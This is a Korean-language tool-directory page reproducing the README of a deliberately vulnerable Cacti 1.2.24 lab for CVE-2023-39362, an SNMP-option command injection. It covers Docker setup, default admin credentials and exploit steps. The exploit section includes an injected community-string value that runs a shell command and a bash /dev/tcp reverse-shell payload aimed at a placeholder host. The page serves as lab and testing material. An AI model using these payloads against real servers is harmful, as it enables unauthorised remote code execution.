Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cacti-rce-snmp-options-vulnerable-application — 경고: 이것은 Cacti 명령 삽입(CVE-2023-39362) 취약점을 테스트하기 위한 취약한 애플리케이션입니다. 실행 시 책임은 본인에게 있습니다! | Kitploit
도구/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlLearning & EducationLabs & Practice
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

경고: 이것은 Cacti 명령 삽입(CVE-2023-39362) 취약점을 테스트하기 위한 취약한 애플리케이션입니다. 실행 시 책임은 본인에게 있습니다!

저장소 보기웹사이트
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Cacti v1.2.24 인증된 명령 주입 (CVE-2023-39362) 취약 애플리케이션

이것은 Cacti 취약점 (CVE-2023-39362)에 대한 익스플로잇을 테스트하기 위한 취약 애플리케이션입니다.

경고!

이 애플리케이션은 심각한 보안 취약점을 포함하고 있습니다. 실행 시 본인이 책임을 져야 합니다! 백업되고 격리된 환경(예: 최근 스냅샷 및 호스트 전용 네트워킹을 사용하는 VM)을 사용하는 것이 좋습니다. 이 애플리케이션을 인터넷에 노출된 서버에 업로드하지 마십시오. 침해될 수 있습니다.

면책 조항: 본인은 누군가 이 애플리케이션을 사용하는 방식에 대해 책임을 지지 않습니다. 이 애플리케이션의 유일한 목적은 CVE-2023-39362 익스플로잇을 위한 테스트 시나리오이며 악의적으로 사용되어서는 안 됩니다. 이 애플리케이션을 설치하여 서버가 침해된 경우, 이는 제 책임이 아니라 업로드하고 설치한 사람(들)의 책임입니다.

취약점 정보

  • CVE-ID: CVE-2023-39362
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • 설명: Cacti 1.2.24에서 특정 조건 하에 인증된 권한 사용자가 장치의 SNMP 옵션에서 악성 문자열을 사용하여 명령 주입을 수행하고 기본 서버에서 원격 코드 실행을 얻을 수 있습니다.

사용법

다음은 환경을 설정하는 단계입니다:

  1. docker compose up -d를 실행하여 구성을 시작합니다.
  2. http://127.0.0.1/cacti로 이동하여 Cacti 초기화 마법사를 시작하여 단계를 완료할 수 있습니다. 데이터베이스 관련 오류가 발생하면 잠시 기다렸다가 페이지를 새로고침하세요.
  3. 기본 자격 증명은 admin/입니다.
admin
  • 마법사 중에 모든 버튼에 대해 "Next"를 누르고 그에 따라 옵션을 선택하세요. 모든 기본값은 괜찮으며 모든 필수 전제 조건이 충족되어야 합니다.
  • 설치 후 admin으로 로그인하세요.
  • "Console" > "Configuration" > "User"로 이동하세요.
  • guest 사용자를 클릭하세요.
  • "Enable"을 활성화하고 비밀번호를 설정한 후 원하는 경우 "Must Change Password at Next Login"을 비활성화하세요.
  • "Save" 버튼을 클릭하세요.
  • "Permissions" 섹션으로 이동하세요.
  • "General Administration" 아래에서 "Console Access"와 "Sites/Devices/Data"를 활성화하세요.
  • "Save" 버튼을 클릭하세요.
  • 로그아웃한 후 guest로 다시 로그인하여 익스플로잇을 시도하세요.
  • 컨테이너는 vuln-cacti라고 불립니다.

    테스트 SNMP 장치의 호스트 이름은 monitored_snmp_device입니다.

    환경을 정리하려면 docker compose down 명령을 사용하세요.

    Cacti의 공식 설치 가이드는 여기에서 찾을 수 있습니다.

    근본 원인

    취약점의 상세한 근본 원인은 원본 보안 자문 또는 제 블로그 게시물에서 확인할 수 있습니다.

    익스플로잇

    (이것은 가능한 하나의 익스플로잇일 뿐입니다.)

    1. "Console" > "Create" > "New Device"로 이동하세요.
    2. SNMP 버전 1 또는 2를 지원하는 장치를 생성하세요.
    3. 장치에 다음 템플릿 중 하나 이상의 그래프가 있는지 확인하세요:
      • "Net-SNMP - Combined SCSI Disk Bytes"
      • "Net-SNMP - Combined SCSI Disk I/O"
      • ("Net-SNMP Device" 템플릿에서 장치를 생성하면 그래프 전제 조건이 충족됩니다.)
    4. "SNMP Options"에서 "SNMP Community String" 필드에 다음과 같은 값을 사용하세요: public\' ; touch /tmp/m3ssap0 ; \'.
    5. "Create" 버튼을 클릭하세요.
    6. /tmp 아래에 생성된 파일이 있는지 확인하세요.

    리버스 셸을 얻으려면 다음과 같은 페이로드를 사용할 수 있습니다.

    root@kitploit:~
    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
    

    저자

    • Antonio Francesco Sardella - 취약점 보고자 - m3ssap0

    라이선스

    이 프로젝트는 Unlicense에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

    도구 다운로드